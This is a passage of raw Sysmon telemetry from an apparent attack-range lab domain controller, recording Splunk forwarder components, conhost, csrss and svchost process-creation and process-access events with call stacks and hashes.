Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000009506Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:47.028{59A5CD1D-939F-6005-DA04-00000000A301}3688C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000009547Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:48.839{59A5CD1D-93A0-6005-DC04-00000000A301}31043264C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009546Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:48.699{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-93A0-6005-DC04-00000000A301}3104C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009545Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:48.699{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009544Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:48.699{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009543Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:48.699{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009542Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:48.699{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009541Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:48.699{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009540Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:48.699{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009539Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:48.699{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009538Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:48.699{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009537Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:48.699{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009536Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:48.699{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-93A0-6005-DC04-00000000A301}3104C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009535Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:48.699{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-93A0-6005-DC04-00000000A301}3104C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000009534Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:48.699{59A5CD1D-93A0-6005-DC04-00000000A301}3104C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000009533Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:48.167{59A5CD1D-93A0-6005-DB04-00000000A301}1156996C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009532Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:48.027{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-93A0-6005-DB04-00000000A301}1156C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009531Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:48.027{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009530Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:48.027{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009529Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:48.027{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009528Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:48.027{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009527Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:48.027{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009526Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:48.027{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009525Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:48.027{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009524Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:48.027{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009523Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 